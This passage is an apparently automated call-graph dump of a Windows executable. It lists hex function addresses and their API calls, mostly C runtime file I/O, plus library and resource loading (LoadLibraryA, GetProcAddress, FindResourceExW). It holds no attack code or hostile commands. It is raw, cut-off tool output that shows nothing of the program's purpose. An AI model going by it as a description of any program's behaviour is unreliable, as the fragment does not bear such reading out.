calls __filbuf 101085->101635 101087 332f20 101087->100866 101088->100866 101090 3192d6 101089->101090 101091 330db6 Mailbox 59 API calls 101090->101091 101092 3192e4 101091->101092 101094 313924 101092->101094 101637 3191fc 59 API calls Mailbox 101092->101637 101095 319050 101094->101095 101638 319160 101095->101638 101097 330db6 Mailbox 59 API calls 101098 313932 101097->101098 101100 318ee0 101098->101100 101099 31905f 101099->101097 101099->101098 101101 34f17c 101100->101101 101106 318ef7 101100->101106 101101->101106 101648 318bdb 59 API calls Mailbox 101101->101648 101103 318fff 101103->100894 101104 319040 101647 319d3c 60 API calls Mailbox 101104->101647 101105 318ff8 101107 330db6 Mailbox 59 API calls 101105->101107 101106->101103 101106->101104 101106->101105 101107->101103 
101110 314ee5 85 API calls 101109->101110 101111 3795ca 101110->101111 101649 379734 101111->101649 101114 314f0b 74 API calls 101115 3795f7 101114->101115 101116 314f0b 74 API calls 101115->101116 101117 379607 101116->101117 101118 314f0b 74 API calls 101117->101118 101119 379622 101118->101119 101120 314f0b 74 API calls 101119->101120 101121 37963d 101120->101121 101122 314ee5 85 API calls 101121->101122 101123 379654 101122->101123 101124 33571c __malloc_crt 58 API calls 101123->101124 101125 37965b 101124->101125 101126 33571c __malloc_crt 58 API calls 101125->101126 101127 379665 101126->101127 101128 314f0b 74 API calls 101127->101128 101129 379679 101128->101129 101130 379109 GetSystemTimeAsFileTime 101129->101130 101131 37968c 101130->101131 101132 3796b6 101131->101132 101133 3796a1 101131->101133 101135 3796bc 101132->101135 101136 37971b 101132->101136 101134 332d55 _free 58 API calls 101133->101134 101137 3796a7 101134->101137 101655 378b06 101135->101655 101139 332d55 _free 58 API calls 101136->101139 101140 332d55 _free 58 API calls 101137->101140 101142 34d186 101139->101142 101140->101142 101142->100831 101144 314e4a 101142->101144 101143 332d55 _free 58 API calls 101143->101142 101145 314e54 101144->101145 101147 314e5b 101144->101147 101146 3353a6 __fcloseall 83 API calls 101145->101146 101146->101147 101148 314e7b FreeLibrary 101147->101148 101149 314e6a 101147->101149 101148->101149 101149->100831 101151 317e4f 59 API calls 101150->101151 101152 3179fd 101151->101152 101152->101032 101154 313f82 101153->101154 101158 313fa4 _memmove 101153->101158 101157 330db6 Mailbox 59 API calls 101154->101157 101155 330db6 Mailbox 59 API calls 101156 313fb8 101155->101156 101156->101041 101157->101158 101158->101155 101208 314c03 101159->101208 101162 314c03 2 API calls 101165 314bdc 101162->101165 101163 314bf5 101166 33525b 101163->101166 101164 314bec FreeLibrary 101164->101163 101165->101163 101165->101164 101212 335270 101166->101212 101168 314dfc 
101168->101047 101168->101048 101370 314c36 101169->101370 101172 314b8f 101173 314ba1 FreeLibrary 101172->101173 101174 314baa 101172->101174 101173->101174 101176 314c70 101174->101176 101175 314c36 2 API calls 101175->101172 101177 330db6 Mailbox 59 API calls 101176->101177 101178 314c85 101177->101178 101374 31522e 101178->101374 101180 314c91 _memmove 101181 314ccc 101180->101181 101182 314dc1 101180->101182 101183 314d89 101180->101183 101184 314ec7 69 API calls 101181->101184 101388 37991b 95 API calls 101182->101388 101377 314e89 CreateStreamOnHGlobal 101183->101377 101190 314cd5 101184->101190 101187 314f0b 74 API calls 101187->101190 101188 314d69 101188->101055 101190->101187 101190->101188 101191 34d8a7 101190->101191 101383 314ee5 101190->101383 101192 314ee5 85 API calls 101191->101192 101193 34d8bb 101192->101193 101194 314f0b 74 API calls 101193->101194 101194->101188 101196 34d9cd 101195->101196 101197 314f1d 101195->101197 101412 3355e2 101197->101412 101200 379109 101610 378f5f 101200->101610 101202 37911f 101202->101063 101204 34d990 101203->101204 101205 314ed6 101203->101205 101615 335c60 101205->101615 101207 314ede 101207->101065 101209 314bd0 101208->101209 101210 314c0c LoadLibraryA 101208->101210 101209->101162 101209->101165 101210->101209 101211 314c1d GetProcAddress 101210->101211 101211->101209 101215 33527c type_info::_Type_info_dtor 101212->101215 101213 33528f 101261 338b28 58 API calls __getptd_noexit 101213->101261 101215->101213 101217 3352c0 101215->101217 101216 335294 101262 338db6 9 API calls __filbuf 101216->101262 101231 3404e8 101217->101231 101220 3352c5 101221 3352db 101220->101221 101222 3352ce 101220->101222 101224 335305 101221->101224 101225 3352e5 101221->101225 101263 338b28 58 API calls __getptd_noexit 101222->101263 101246 340607 101224->101246 101264 338b28 58 API calls __getptd_noexit 101225->101264 101228 33529f type_info::_Type_info_dtor @_EH4_CallFilterFunc@8 101228->101168 101232 3404f4 
type_info::_Type_info_dtor 101231->101232 101233 339c0b __lock 58 API calls 101232->101233 101240 340502 101233->101240 101234 340576 101266 3405fe 101234->101266 101235 34057d 101271 33881d 58 API calls __malloc_crt 101235->101271 101238 3405f3 type_info::_Type_info_dtor 101238->101220 101239 340584 101239->101234 101272 339e2b InitializeCriticalSectionAndSpinCount 101239->101272 101240->101234 101240->101235 101242 339c93 __mtinitlocknum 58 API calls 101240->101242 101269 336c50 59 API calls __lock 101240->101269 101270 336cba LeaveCriticalSection LeaveCriticalSection _doexit 101240->101270 101242->101240 101244 3405aa EnterCriticalSection 101244->101234 101254 340627 __wopenfile 101246->101254 101247 340641 101277 338b28 58 API calls __getptd_noexit 101247->101277 101249 340646 101278 338db6 9 API calls __filbuf 101249->101278 101251 34085f 101274 3485a1 101251->101274 101252 335310 101265 335332 LeaveCriticalSection LeaveCriticalSection _fseek 101252->101265 101254->101247 101257 3407fc 101254->101257 101279 3337cb 60 API calls 2 library calls 101254->101279 101256 3407f5 101256->101257 101280 3337cb 60 API calls 2 library calls 101256->101280 101257->101247 101257->101251 101259 340814 101259->101257 101281 3337cb 60 API calls 2 library calls 101259->101281 101261->101216 101262->101228 101263->101228 101264->101228 101265->101228 101273 339d75 LeaveCriticalSection 101266->101273 101268 340605 101268->101238 101269->101240 101270->101240 101271->101239 101272->101244 101273->101268 101282 347d85 101274->101282 101276 3485ba 101276->101252 101277->101249 101278->101252 101279->101256 101280->101259 101281->101257 101283 347d91 type_info::_Type_info_dtor 101282->101283 101284 347da7 101283->101284 101287 347ddd 101283->101287 101367 338b28 58 API calls __getptd_noexit 101284->101367 101286 347dac 101368 338db6 9 API calls __filbuf 101286->101368 101293 347e4e 101287->101293 101290 347df9 101369 347e22 LeaveCriticalSection __unlock_fhandle 101290->101369 101292 
347db6 type_info::_Type_info_dtor 101292->101276 101294 347e6e 101293->101294 101295 3344ea __wsopen_nolock 58 API calls 101294->101295 101298 347e8a 101295->101298 101296 338dc6 __invoke_watson 8 API calls 101297 3485a0 101296->101297 101300 347d85 __wsopen_helper 103 API calls 101297->101300 101299 347ec4 101298->101299 101310 347ee7 101298->101310 101366 347fc1 101298->101366 101301 338af4 __commit 58 API calls 101299->101301 101302 3485ba 101300->101302 101303 347ec9 101301->101303 101302->101290 101304 338b28 __filbuf 58 API calls 101303->101304 101305 347ed6 101304->101305 101307 338db6 __filbuf 9 API calls 101305->101307 101306 347fa5 101308 338af4 __commit 58 API calls 101306->101308 101309 347ee0 101307->101309 101311 347faa 101308->101311 101309->101290 101310->101306 101315 347f83 101310->101315 101312 338b28 __filbuf 58 API calls 101311->101312 101313 347fb7 101312->101313 101314 338db6 __filbuf 9 API calls 101313->101314 101314->101366 101316 33d294 __alloc_osfhnd 61 API calls 101315->101316 101317 348051 101316->101317 101318 34807e 101317->101318 101319 34805b 101317->101319 101321 347cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 101318->101321 101320 338af4 __commit 58 API calls 101319->101320 101322 348060 101320->101322 101329 3480a0 101321->101329 101324 338b28 __filbuf 58 API calls 101322->101324 101323 34811e GetFileType 101327 348129 GetLastError 101323->101327 101328 34816b 101323->101328 101326 34806a 101324->101326 101325 3480ec GetLastError 101330 338b07 __dosmaperr 58 API calls 101325->101330 101331 338b28 __filbuf 58 API calls 101326->101331 101332 338b07 __dosmaperr 58 API calls 101327->101332 101338 33d52a __set_osfhnd 59 API calls 101328->101338 101329->101323 101329->101325 101333 347cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 101329->101333 101334 348111 101330->101334 101331->101309 101335 348150 CloseHandle 101332->101335 101337 3480e1 101333->101337 101340 338b28 __filbuf 58 API calls 
101334->101340 101335->101334 101336 34815e 101335->101336 101339 338b28 __filbuf 58 API calls 101336->101339 101337->101323 101337->101325 101342 348189 101338->101342 101341 348163 101339->101341 101340->101366 101341->101334 101343 348344 101342->101343 101344 3418c1 __lseeki64_nolock 60 API calls 101342->101344 101351 34820a 101342->101351 101345 348517 CloseHandle 101343->101345 101343->101366 101346 3481f3 101344->101346 101347 347cfd ___createFile GetModuleHandleW GetProcAddress CreateFileW 101345->101347 101348 338af4 __commit 58 API calls 101346->101348 101346->101351 101350 34853e 101347->101350 101348->101351 101349 340e5b 70 API calls __read_nolock 101349->101351 101352 348546 GetLastError 101350->101352 101359 348572 101350->101359 101351->101343 101351->101349 101355 340add __close_nolock 61 API calls 101351->101355 101356 34823c 101351->101356 101360 33d886 __write 78 API calls 101351->101360 101361 3483c1 101351->101361 101362 3418c1 60 API calls __lseeki64_nolock 101351->101362 101353 338b07 __dosmaperr 58 API calls 101352->101353 101354 348552 101353->101354 101357 33d43d __free_osfhnd 59 API calls 101354->101357 101355->101351 101356->101351 101358 3497a2 __chsize_nolock 82 API calls 101356->101358 101357->101359 101358->101356 101359->101366 101360->101351 101363 340add __close_nolock 61 API calls 101361->101363 101362->101351 101364 3483c8 101363->101364 101365 338b28 __filbuf 58 API calls 101364->101365 101365->101366 101366->101296 101367->101286 101368->101292 101369->101292 101371 314b83 101370->101371 101372 314c3f LoadLibraryA 101370->101372 101371->101172 101371->101175 101372->101371 101373 314c50 GetProcAddress 101372->101373 101373->101371 101375 330db6 Mailbox 59 API calls 101374->101375 101376 315240 101375->101376 101376->101180 101378 314ea3 FindResourceExW 101377->101378 101382 314ec0 101377->101382 101379 34d933 LoadResource 101378->101379 101378->101382 101380 34d948 SizeofResource 101379->101380 101379->101382 101381 34d95c 
LockResource 101380->101381 101380->101382 101381->101382 101382->101181 101384 314ef4 101383->101384 101385 34d9ab 101383->101385 101389 33584d 101384->101389 101387 314f02 101387->101190 101388->101181 101390 335859 type_info::_Type_info_dtor 101389->101390 101391 33586b 101390->101391 101393 335891 101390->101393 101402 338b28 58 API calls __getptd_noexit 101391->101402 101404 336c11 101393->101404 101394 335870 101403 338db6 9 API calls __filbuf 101394->101403 101397 335897 101410 3357be 83 API calls 4 library calls 101397->101410 101399 3358a6 101411 3358c8 LeaveCriticalSection LeaveCriticalSection _fseek 101399->101411 101401 33587b type_info::_Type_info_dtor 101401->101387 101402->101394 101403->101401 101405 336c43 EnterCriticalSection 101404->101405 101406 336c21 101404->101406 101409 336c39 101405->101409 101406->101405 101407 336c29 101406->101407 101408 339c0b __lock 58 API calls 101407->101408 101408->101409 101409->101397 101410->101399 101411->101401 101415 3355fd 101412->101415 101414 314f2e 101414->101200 101416 335609 type_info::_Type_info_dtor 101415->101416 101417 33561f _memset 101416->101417 101418 33564c 101416->101418 101419 335644 type_info::_Type_info_dtor 101416->101419 101442 338b28 58 API calls __getptd_noexit 101417->101442 101420 336c11 __lock_file 59 API calls 101418->101420 101419->101414 101422 335652 101420->101422 101428 33541d 101422->101428 101423 335639 101443 338db6 9 API calls __filbuf 101423->101443 101432 335438 _memset 101428->101432 101434 335453 101428->101434 101429 335443 101540 338b28 58 API calls __getptd_noexit 101429->101540 101431 335448 101541 338db6 9 API calls __filbuf 101431->101541 101432->101429 101432->101434 101439 335493 101432->101439 101444 335686 LeaveCriticalSection LeaveCriticalSection _fseek 101434->101444 101436 3355a4 _memset 101543 338b28 58 API calls __getptd_noexit 101436->101543 101439->101434 101439->101436 101445 3346e6 101439->101445 101452 340e5b 101439->101452 101520 340ba7 
101439->101520 101542 340cc8 58 API calls 3 library calls 101439->101542 101442->101423 101443->101419 101444->101419 101446 3346f0 101445->101446 101447 334705 101445->101447 101544 338b28 58 API calls __getptd_noexit 101446->101544 101447->101439 101449 3346f5 101545 338db6 9 API calls __filbuf 101449->101545 101451 334700 101451->101439 101453 340e93 101452->101453 101454 340e7c 101452->101454 101455 3415cb 101453->101455 101459 340ecd 101453->101459 101555 338af4 58 API calls __getptd_noexit 101454->101555 101571 338af4 58 API calls __getptd_noexit 101455->101571 101458 340e81 101556 338b28 58 API calls __getptd_noexit 101458->101556 101462 340ed5 101459->101462 101470 340eec 101459->101470 101460 3415d0 101572 338b28 58 API calls __getptd_noexit 101460->101572 101557 338af4 58 API calls __getptd_noexit 101462->101557 101465 340ee1 101573 338db6 9 API calls __filbuf 101465->101573 101466 340e88 101466->101439 101467 340eda 101558 338b28 58 API calls __getptd_noexit 101467->101558 101469 340f01 101559 338af4 58 API calls __getptd_noexit 101469->101559 101470->101466 101470->101469 101471 340f1b 101470->101471 101475 340f39 101470->101475 101471->101469 101474 340f26 101471->101474 101546 345c6b 101474->101546 101560 33881d 58 API calls __malloc_crt 101475->101560 101477 340f49 101479 340f51 101477->101479 101480 340f6c 101477->101480 101561 338b28 58 API calls __getptd_noexit 101479->101561 101563 3418c1 60 API calls 3 library calls 101480->101563 101481 34103a 101484 3410b3 ReadFile 101481->101484 101485 341050 GetConsoleMode 101481->101485 101487 3410d5 101484->101487 101488 341593 GetLastError 101484->101488 101489 341064 101485->101489 101490 3410b0 101485->101490 101486 340f56 101562 338af4 58 API calls __getptd_noexit 101486->101562 101487->101488 101496 3410a5 101487->101496 101492 341093 101488->101492 101493 3415a0 101488->101493 101489->101490 101494 34106a ReadConsoleW 101489->101494 101490->101484 101503 341099 101492->101503 101564 338b07 58 API 
calls 3 library calls 101492->101564 101569 338b28 58 API calls __getptd_noexit 101493->101569 101494->101496 101497 34108d GetLastError 101494->101497 101502 34110a 101496->101502 101496->101503 101506 341377 101496->101506 101497->101492 101499 3415a5 101570 338af4 58 API calls __getptd_noexit 101499->101570 101501 332d55 _free 58 API calls 101501->101466 101505 341176 ReadFile 101502->101505 101513 3411f7 101502->101513 101503->101466 101503->101501 101508 341197 GetLastError 101505->101508 101518 3411a1 101505->101518 101506->101503 101507 34147d ReadFile 101506->101507 101512 3414a0 GetLastError 101507->101512 101519 3414ae 101507->101519 101508->101518 101509 3412b4 101514 341264 MultiByteToWideChar 101509->101514 101567 3418c1 60 API calls 3 library calls 101509->101567 101510 3412a4 101566 338b28 58 API calls __getptd_noexit 101510->101566 101512->101519 101513->101503 101513->101509 101513->101510 101513->101514 101514->101497 101514->101503 101518->101502 101565 3418c1 60 API calls 3 library calls 101518->101565 101519->101506 101568 3418c1 60 API calls 3 library calls 101519->101568 101521 340bb2 101520->101521 101525 340bc7 101520->101525 101607 338b28 58 API calls __getptd_noexit 101521->101607 101523 340bb7 101608 338db6 9 API calls __filbuf 101523->101608 101526 340bfc 101525->101526 101534 340bc2 101525->101534 101609 345fe4 58 API calls __malloc_crt 101525->101609 101528 3346e6 __filbuf 58 API calls 101526->101528 101529 340c10 101528->101529 101574 340d47 101529->101574 101531 340c17 101532 3346e6 __filbuf 58 API calls 101531->101532 101531->101534 101533 340c3a 101532->101533 101533->101534 101535 3346e6 __filbuf 58 API calls 101533->101535 101534->101439 101536 340c46 101535->101536 101536->101534 101537 3346e6 __filbuf 58 API calls 101536->101537 101538 340c53 101537->101538 101539 3346e6 __filbuf 58 API calls 101538->101539 101539->101534 101540->101431 101541->101434 101542->101439 101543->101431 101544->101449 101545->101451 101547 345c76 
101546->101547 101548 345c83 101546->101548 101549 338b28 __filbuf 58 API calls 101547->101549 101551 345c8f 101548->101551 101552 338b28 __filbuf 58 API calls 101548->101552 101550 345c7b 101549->101550 101550->101481 101551->101481 101553 345cb0 101552->101553 101554 338db6 __filbuf 9 API calls 101553->101554 101554->101550 101555->101458 101556->101466 101557->101467 101558->101465 101559->101467 101560->101477 101561->101486 101562->101466 101563->101474 101564->101503 101565->101518 101566->101503 101567->101514 101568->101519 101569->101499 101570->101503 101571->101460 101572->101465 101573->101466 101575 340d53 type_info::_Type_info_dtor 101574->101575 101576 340d77 101575->101576 101577 340d60 101575->101577 101579 340e3b 101576->101579 101582 340d8b 101576->101582 101578 338af4 __commit 58 API calls 101577->101578 101581 340d65 101578->101581 101580 338af4 __commit 58 API calls 101579->101580 101583 340dae 101580->101583 101584 338b28 __filbuf 58 API calls 101581->101584 101585 340db6 101582->101585 101586 340da9 101582->101586 101592 338b28 __filbuf 58 API calls 101583->101592 101599 340d6c type_info::_Type_info_dtor 101584->101599 101587 340dc3 101585->101587 101588 340dd8 101585->101588 101589 338af4 __commit 58 API calls 101586->101589 101590 338af4 __commit 58 API calls 101587->101590 101591 33d206 ___lock_fhandle 59 API calls 101588->101591 101589->101583 101593 340dc8 101590->101593 101594 340dde 101591->101594 101595 340dd0 101592->101595 101596 338b28 __filbuf 58 API calls 101593->101596 101597 340e04 101594->101597 101598 340df1 101594->101598 101601 338db6 __filbuf 9 API calls 101595->101601 101596->101595 101602 338b28 __filbuf 58 API calls 101597->101602 101600 340e5b __read_nolock 70 API calls 101598->101600 101599->101531 101603 340dfd 101600->101603 101601->101599 101604 340e09 101602->101604 101606 340e33 __read LeaveCriticalSection 101603->101606 101605 338af4 __commit 58 API calls 101604->101605 101605->101603 101606->101599 
101607->101523 101608->101534 101609->101526 101613 33520a GetSystemTimeAsFileTime 101610->101613 101612 378f6e 101612->101202 101614 335238 __aulldiv 101613->101614 101614->101612 101616 335c6c type_info::_Type_info_dtor 101615->101616 101617 335c93 101616->101617 101618 335c7e 101616->101618 101620 336c11 __lock_file 59 API calls 101617->101620 101629 338b28 58 API calls __getptd_noexit 101618->101629 101622 335c99 101620->101622 101621 335c83 101630 338db6 9 API calls __filbuf 101621->101630 101631 3358d0 67 API calls 5 library calls 101622->101631 101625 335ca4 101632 335cc4 LeaveCriticalSection LeaveCriticalSection _fseek 101625->101632 101626 335c8e type_info::_Type_info_dtor 101626->101207 101628 335cb6 101628->101626 101629->101621 101630->101626 101631->101625 101632->101628 101633->101070 101634->101085 101635->101087 101636->101084 101637->101094 101639 319169 Mailbox 101638->101639 101640 34f19f 101639->101640 101645 319173 101639->101645 101641 330db6 Mailbox 59 API calls 101640->101641 101643 34f1ab 101641->101643 101642 31917a 101642->101099 101645->101642 101646 319c90 59 API calls Mailbox 101645->101646 101646->101645 101647->101103 101648->101106 101654 379748 __tzset_nolock _wcscmp 101649->101654 101650 3795dc 101650->101114 101650->101142 101651 314f0b 74 API calls 101651->101654 101652 379109 GetSystemTimeAsFileTime 101652->101654 101653 314ee5 85 API calls 101653->101654 101654->101650 101654->101651 101654->101652 101654->101653 101656 378b11 101655->101656 101657 378b1f 101655->101657 101658 33525b 115 API calls 101656->101658 101659 378b64 101657->101659 101660 33525b 115 API calls 101657->101660 101682 378b28 101657->101682 101658->101657 101686 378d91 101659->101686 101662 378b49 101660->101662 101662->101659 101663 378b52 101662->101663 101667 3353a6 __fcloseall 83 API calls 101663->101667 101663->101682 101664 378ba8 101665 378bcd 101664->101665 101666 378bac 101664->101666 101690 3789a9 101665->101690 101669 378bb9 101666->101669 
101671 3353a6 __fcloseall 83 API calls 101666->101671 101667->101682 101674 3353a6 __fcloseall 83 API calls 101669->101674 101669->101682 101671->101669 101672 378bfb 101699 378c2b 101672->101699 101673 378bdb 101675 378be8 101673->101675 101678 3353a6 __fcloseall 83 API calls 101673->101678 101674->101682 101680 3353a6 __fcloseall 83 API calls 101675->101680 101675->101682 101678->101675 101680->101682 101682->101143 101683 378c16 101683->101682 101685 3353a6 __fcloseall 83 API calls 101683->101685 101685->101682 101687 378db6 101686->101687 101689 378d9f __tzset_nolock _memmove 101686->101689 101688 3355e2 __fread_nolock 74 API calls 101687->101688 101688->101689 101689->101664 101691 33571c __malloc_crt 58 API calls 101690->101691 101692 3789b8 101691->101692 101693 33571c __malloc_crt 58 API calls 101692->101693 101694 3789cc 101693->101694 101695 33571c __malloc_crt 58 API calls 101694->101695 101696 3789e0 101695->101696 101697 378d0d 58 API calls 101696->101697 101698 3789f3 101696->101698 101697->101698 101698->101672 101698->101673 101703 378c40 101699->101703 101700 378cf8 101732 378f35 101700->101732 101701 378a05 74 API calls 101701->101703 101703->101700 101703->101701 101706 378c02 101703->101706 101728 378e12 101703->101728 101736 378aa1 74 API calls 101703->101736 101707 378d0d 101706->101707 101708 378d1a 101707->101708 101711 378d20 101707->101711 101709 332d55 _free 58 API calls 101708->101709 101709->101711 101710 378d31 101713 378c09 101710->101713 101714 332d55 _free 58 API calls 101710->101714 101711->101710 101712 332d55 _free 58 API calls 101711->101712 101712->101710 101713->101683 101715 3353a6 101713->101715 101714->101713 101716 3353b2 type_info::_Type_info_dtor 101715->101716 101717 3353c6 101716->101717 101718 3353de 101716->101718 101785 338b28 58 API calls __getptd_noexit 101717->101785 101721 336c11 __lock_file 59 API calls 101718->101721 101727 3353d6 type_info::_Type_info_dtor 101718->101727 101720 3353cb 101786 338db6 9 API 
calls __filbuf 101720->101786 101723 3353f0 101721->101723 101769 33533a 101723->101769 101727->101683 101729 378e21 101728->101729 101730 378e61 101728->101730 101729->101703 101730->101729 101737 378ee8 101730->101737 101733 378f42 101732->101733 101734 378f53 101732->101734 101735 334863 80 API calls 101733->101735 101734->101706 101735->101734 101736->101703 101738 378f14 101737->101738 101739 378f25 101737->101739 101741 334863 101738->101741 101739->101730 101742 33486f type_info::_Type_info_dtor 101741->101742 101743 3348a5 101742->101743 101744 33488d 101742->101744 101745 33489d type_info::_Type_info_dtor 101742->101745 101746 336c11 __lock_file 59 API calls 101743->101746 101766 338b28 58 API calls __getptd_noexit 101744->101766 101745->101739 101748 3348ab 101746->101748 101754 33470a 101748->101754 101749 334892 101767 338db6 9 API calls __filbuf 101749->101767 101757 334719 101754->101757 101761 334737 101754->101761 101755 334727 101756 338b28 __filbuf 58 API calls 101755->101756 101758 33472c 101756->101758 101757->101755 101757->101761 101763 334751 _memmove 101757->101763 101759 338db6 __filbuf 9 API calls 101758->101759 101759->101761 101760 33ae1e __flsbuf 78 API calls 101760->101763 101768 3348dd LeaveCriticalSection LeaveCriticalSection _fseek 101761->101768 101762 334a3d __flush 78 API calls 101762->101763 101763->101760 101763->101761 101763->101762 101764 3346e6 __filbuf 58 API calls 101763->101764 101765 33d886 __write 78 API calls 101763->101765 101764->101763 101765->101763 101766->101749 101767->101745 101768->101745 101770 335349 101769->101770 101771 33535d 101769->101771 101824 338b28 58 API calls __getptd_noexit 101770->101824 101772 335359 101771->101772 101788 334a3d 101771->101788 101787 335415 LeaveCriticalSection LeaveCriticalSection _fseek 101772->101787 101775 33534e 101825 338db6 9 API calls __filbuf 101775->101825 101780 3346e6 __filbuf 58 API calls 101781 335377 101780->101781 101798 340a02 101781->101798 101783 33537d 
101783->101772 101784 332d55 _free 58 API calls 101783->101784 101784->101772 101785->101720 101786->101727 101787->101727 101789 334a50 101788->101789 101790 334a74 101788->101790 101789->101790 101791 3346e6 __filbuf 58 API calls 101789->101791 101794 340b77 101790->101794 101792 334a6d 101791->101792 101826 33d886 101792->101826 101795 335371 101794->101795 101796 340b84 101794->101796 101795->101780 101796->101795 101797 332d55 _free 58 API calls 101796->101797 101797->101795 101799 340a0e type_info::_Type_info_dtor 101798->101799 101800 340a32 101799->101800 101801 340a1b 101799->101801 101803 340abd 101800->101803 101805 340a42 101800->101805 101951 338af4 58 API calls __getptd_noexit 101801->101951 101956 338af4 58 API calls __getptd_noexit 101803->101956 101804 340a20 101952 338b28 58 API calls __getptd_noexit 101804->101952 101808 340a60 101805->101808 101809 340a6a 101805->101809 101953 338af4 58 API calls __getptd_noexit 101808->101953 101812 33d206 ___lock_fhandle 59 API calls 101809->101812 101810 340a65 101957 338b28 58 API calls __getptd_noexit 101810->101957 101814 340a70 101812->101814 101816 340a83 101814->101816 101817 340a8e 101814->101817 101815 340ac9 101958 338db6 9 API calls __filbuf 101815->101958 101936 340add 101816->101936 101954 338b28 58 API calls __getptd_noexit 101817->101954 101821 340a27 type_info::_Type_info_dtor 101821->101783 101822 340a89 101955 340ab5 LeaveCriticalSection __unlock_fhandle 101822->101955 101824->101775 101825->101772 101827 33d892 type_info::_Type_info_dtor 101826->101827 101828 33d8b6 101827->101828 101829 33d89f 101827->101829 101831 33d955 101828->101831 101833 33d8ca 101828->101833 101927 338af4 58 API calls __getptd_noexit 101829->101927 101933 338af4 58 API calls __getptd_noexit 101831->101933 101832 33d8a4 101928 338b28 58 API calls __getptd_noexit 101832->101928 101836 33d8f2 101833->101836 101837 33d8e8 101833->101837 101854 33d206 101836->101854 101929 338af4 58 API calls __getptd_noexit 
101837->101929 101838 33d8ed 101934 338b28 58 API calls __getptd_noexit 101838->101934 101839 33d8ab type_info::_Type_info_dtor 101839->101790 101842 33d8f8 101844 33d90b 101842->101844 101845 33d91e 101842->101845 101863 33d975 101844->101863 101930 338b28 58 API calls __getptd_noexit 101845->101930 101846 33d961 101935 338db6 9 API calls __filbuf 101846->101935 101850 33d923 101931 338af4 58 API calls __getptd_noexit 101850->101931 101851 33d917 101932 33d94d LeaveCriticalSection __unlock_fhandle 101851->101932 101855 33d212 type_info::_Type_info_dtor 101854->101855 101856 33d261 EnterCriticalSection 101855->101856 101857 339c0b __lock 58 API calls 101855->101857 101858 33d287 type_info::_Type_info_dtor 101856->101858 101859 33d237 101857->101859 101858->101842 101860 33d24f 101859->101860 101861 339e2b __ioinit InitializeCriticalSectionAndSpinCount 101859->101861 101862 33d28b ___lock_fhandle LeaveCriticalSection 101860->101862 101861->101860 101862->101856 101864 33d982 __write_nolock 101863->101864 101865 33d9b6 101864->101865 101866 33d9c1 101864->101866 101867 33d9e0 101864->101867 101869 33c5f6 __NMSG_WRITE 6 API calls 101865->101869 101868 338af4 __commit 58 API calls 101866->101868 101871 33da38 101867->101871 101872 33da1c 101867->101872 101870 33d9c6 101868->101870 101873 33e1d6 101869->101873 101874 338b28 __filbuf 58 API calls 101870->101874 101875 33da51 101871->101875 101878 3418c1 __lseeki64_nolock 60 API calls 101871->101878 101876 338af4 __commit 58 API calls 101872->101876 101873->101851 101877 33d9cd 101874->101877 101879 345c6b __flsbuf 58 API calls 101875->101879 101880 33da21 101876->101880 101881 338db6 __filbuf 9 API calls 101877->101881 101878->101875 101882 33da5f 101879->101882 101883 338b28 __filbuf 58 API calls 101880->101883 101881->101865 101884 33ddb8 101882->101884 101889 3399ac ____lc_codepage_func 58 API calls 101882->101889 101885 33da28 101883->101885 101886 33ddd6 101884->101886 101887 33e14b WriteFile 101884->101887 101888 
338db6 __filbuf 9 API calls 101885->101888 101890 33defa 101886->101890 101899 33ddec 101886->101899 101891 33ddab GetLastError 101887->101891 101892 33dd78 101887->101892 101888->101865 101893 33da8b GetConsoleMode 101889->101893 101901 33df05 101890->101901 101904 33dfef 101890->101904 101891->101892 101892->101865 101894 33e184 101892->101894 101903 33ded8 101892->101903 101893->101884 101895 33daca 101893->101895 101894->101865 101897 338b28 __filbuf 58 API calls 101894->101897 101895->101884 101898 33dada GetConsoleCP 101895->101898 101896 33de5b WriteFile 101896->101891 101900 33de98 101896->101900 101902 33e1b2 101897->101902 101898->101894 101922 33db09 101898->101922 101899->101894 101899->101896 101900->101899 101906 33debc 101900->101906 101901->101894 101907 33df6a WriteFile 101901->101907 101908 338af4 __commit 58 API calls 101902->101908 101909 33dee3 101903->101909 101910 33e17b 101903->101910 101904->101894 101905 33e064 WideCharToMultiByte 101904->101905 101905->101891 101919 33e0ab 101905->101919 101906->101892 101907->101891 101911 33dfb9 101907->101911 101908->101865 101912 338b28 __filbuf 58 API calls 101909->101912 101913 338b07 __dosmaperr 58 API calls 101910->101913 101911->101892 101911->101901 101911->101906 101915 33dee8 101912->101915 101913->101865 101914 33e0b3 WriteFile 101917 33e106 GetLastError 101914->101917 101914->101919 101918 338af4 __commit 58 API calls 101915->101918 101916 3335f5 __write_nolock 58 API calls 101916->101922 101917->101919 101918->101865 101919->101892 101919->101904 101919->101906 101919->101914 101920 3462ba 60 API calls __write_nolock 101920->101922 101921 347a5e WriteConsoleW CreateFileW __putwch_nolock 101925 33dc5f 101921->101925 101922->101892 101922->101916 101922->101920 101923 33dbf2 WideCharToMultiByte 101922->101923 101922->101925 101923->101892 101924 33dc2d WriteFile 101923->101924 101924->101891 101924->101925 101925->101891 101925->101892 101925->101921 101925->101922 101926 33dc87 WriteFile 
101925->101926 101926->101891 101926->101925 101927->101832 101928->101839 101929->101838 101930->101850 101931->101851 101932->101839 101933->101838 101934->101846 101935->101839 101959 33d4c3 101936->101959 101938 340b41 101972 33d43d 59 API calls 2 library calls 101938->101972 101940 340aeb 101940->101938 101943 33d4c3 __commit 58 API calls 101940->101943 101950 340b1f 101940->101950 101941 33d4c3 __commit 58 API calls 101944 340b2b CloseHandle 101941->101944 101942 340b49 101945 340b6b 101942->101945 101973 338b07 58 API calls 3 library calls 101942->101973 101946 340b16 101943->101946 101944->101938 101947 340b37 GetLastError 101944->101947 101945->101822 101949 33d4c3 __commit 58 API calls 101946->101949 101947->101938 101949->101950 101950->101938 101950->101941 101951->101804 101952->101821 101953->101810 101954->101822 101955->101821 101956->101810 101957->101815 101958->101821 101960 33d4e3 101959->101960 101961 33d4ce 101959->101961 101964 338af4 __commit 58 API calls 101960->101964 101966 33d508 101960->101966 101962 338af4 __commit 58 API calls 101961->101962 101963 33d4d3 101962->101963 101965 338b28 __filbuf 58 API calls 101963->101965 101967 33d512 101964->101967 101968 33d4db 101965->101968 101966->101940 101969 338b28 __filbuf 58 API calls 101967->101969 101968->101940 101970 33d51a 101969->101970 101971 338db6 __filbuf 9 API calls 101970->101971 101971->101968 101972->101942 101973->101945 102036 341940 101974->102036 101977 314799 102042 317d8c 101977->102042 101978 31477c 101979 317bcc 59 API calls 101978->101979 101981 314788 101979->101981 102038 317726 101981->102038 101984 330791 101985 341940 __write_nolock 